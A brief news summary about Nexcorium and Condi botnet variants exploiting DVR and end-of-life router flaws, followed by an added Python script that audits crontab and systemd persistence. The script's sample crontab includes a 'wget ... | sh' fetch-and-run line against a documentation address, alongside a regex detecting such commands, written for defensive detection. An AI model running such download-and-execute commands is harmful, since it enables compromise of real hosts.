Threat actors are actively exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link routers to deploy Mirai-based botnet variants, specifically Nexcorium and Condi. Research from Fortinet and Unit 42 highlights the use of CVE-2024-3721 and CVE-2023-33538 to gain initial access and establish persistent command-and-control for launching DDoS attacks.
The Nexcorium variant features advanced persistence mechanisms using crontab and systemd, alongside brute-force capabilities targeting Telnet services and exploitation of older flaws like CVE-2017-17215. Security experts emphasize the ongoing risk posed by unpatched IoT devices and default credentials, urging users to replace EoL hardware that no longer receives security updates to prevent recruitment into botnet infrastructures.
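A check for the crontab and systemd persistence mentioned above, as an added example that is not from Fortinet, Unit 42 or the original page: it flags persisted commands that run from world-writable directories or download and then execute a script. Those two heuristics, the sample crontab and unit text, and all function names are assumptions constructed here, not published Nexcorium indicators.

```python
import re

# Assumed generic heuristics; these are not published Nexcorium indicators.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_AND_RUN = re.compile(r"\b(wget|curl|tftp)\b.*(\||;|&&)\s*(sh|bash|chmod)\b")

# Constructed sample input (192.0.2.10 is a documentation-only address).
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /tmp/.upd >/dev/null 2>&1
*/5 * * * * wget -q http://192.0.2.10/x.sh -O- | sh
"""
SAMPLE_UNIT = "[Service]\nExecStart=/var/tmp/netsvc\nRestart=always\n"

def suspicious(command):
    """Return the reasons a persisted command line deserves review."""
    reasons = []
    if any(tok.startswith(WRITABLE_DIRS) for tok in command.split()):
        reasons.append("runs from world-writable directory")
    if FETCH_AND_RUN.search(command):
        reasons.append("downloads then executes")
    return reasons

def cron_commands(text):
    """Yield the command part of each user-crontab entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"[A-Za-z_]+\s*=", line):
            continue  # blank line, comment, or environment assignment
        fields = 1 if line.startswith("@") else 5  # @reboot vs. five time fields
        parts = line.split(None, fields)
        if len(parts) == fields + 1:
            yield parts[fields]

def unit_commands(text):
    """Yield ExecStart/ExecStartPre/ExecStartPost commands from a unit file."""
    for line in text.splitlines():
        m = re.match(r"\s*ExecStart(?:Pre|Post)?\s*=\s*[-@+!:]*(.+)", line)
        if m:
            yield m.group(1).strip()

def audit(crontab="", unit=""):
    """Return (source, command, reason) for every flagged persistence entry."""
    sources = (("cron", cron_commands(crontab)), ("systemd", unit_commands(unit)))
    return [(src, cmd, why) for src, cmds in sources
            for cmd in cmds for why in suspicious(cmd)]

if __name__ == "__main__":
    for finding in audit(SAMPLE_CRONTAB, SAMPLE_UNIT):
        print(*finding, sep=" | ")
```

On a real host, feed `audit` the output of `crontab -l` for each account and the contents of unit files under `/etc/systemd/system`; a hit is a prompt for review, not proof of infection.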